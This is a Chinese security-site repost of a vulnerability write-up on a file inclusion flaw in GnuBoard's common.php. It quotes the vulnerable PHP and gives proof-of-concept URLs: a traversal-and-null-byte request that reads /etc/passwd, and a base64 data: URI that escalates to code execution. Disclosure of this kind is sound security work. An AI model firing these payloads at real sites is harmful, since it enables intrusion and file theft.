首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>漏洞资料>文章内容
GnuBoard本地文件包含漏洞
来源:http://bbs.wolvez.org/ 作者:Flyh4t 发布时间:2011-02-18  

By Flyh4t

http://bbs.wolvez.org/

GnuBoard是韩国比较常见的一个论坛,存在较多的漏洞,其中common.php存在一个文件包含漏洞
看common.php代码

@extract($_GET);
@extract($_POST);
@extract($_SERVER);

……

if (!$g4_path || preg_match(“/:\/\//”, $g4_path))
die(“ “);

//if (!$g4_path) $g4_path = “.”;

$g4['path'] = $g4_path; //只限制了$g4_path不能有字符 ://

unset($g4_path);

include_once(“$g4[path]/lib/constant.php”); //本地文件包含漏洞
include_once(“$g4[path]/config.php”);

POC:

http://test.com/GnuBoard/common.php?g4_path=../../../../../../../etc/passwd%00

———————————————————————————–
在Ryat牛的提示下,这个本地包含晋升为远程代码执行漏洞。
bypass_local.php

if (!$g4_path || preg_match("/:\/\//", $g4_path))
die("fuck");
$g4['path'] = $g4_path;
unset($g4_path);
include_once("$g4[path]/lib/constant.php");
?>

在allow_url_include = On且PHP >= 5.2.0的条件下
提交bypass_local.php?g4_path=data:;base64,PD9waHBpbmZvKCk7Lyo=
成功执行phpinfo()


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·XSOK环境变量本地命令执行漏洞
·N点虚拟主机管理系统 致命漏洞。
·南方数据企业网站管理系统V10.0
·动网(DVBBS)Version 8.2.0 后
·Solaris 10 telnet漏洞及解决
·破解无线路由器密码,常见无线密
·Nginx %00空字节执行php漏洞
·WinWebMail、7I24提权漏洞
·XPCD xpcd-svga本地缓冲区溢出漏
·Struts2多个漏洞简要分析
·ecshop2.72 api.php 文件鸡肋注
·Discuz!后台拿Webshell 0day
  相关文章
·php168 v6~v7鸡肋Getshell安全问
·天天团购 V1.2.0 Beta SQL injec
·DISCUZX1.5 本地文件包含漏洞
·无忧购物系统ASP时尚版存在后门
·皮皮播放器ActiveX控件PlayURLWi
·皮皮播放器ActiveX控件 PlayURL
·Diy-Page v8.2 两个注入漏洞分析
·ecshop支付漏洞最新可用EXP利用
·plesk panel 虚拟主机管理平台 0
·入侵网站的经验
·boblog任意变量覆盖漏洞
·discuz 7.2的漏洞及修复方法
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved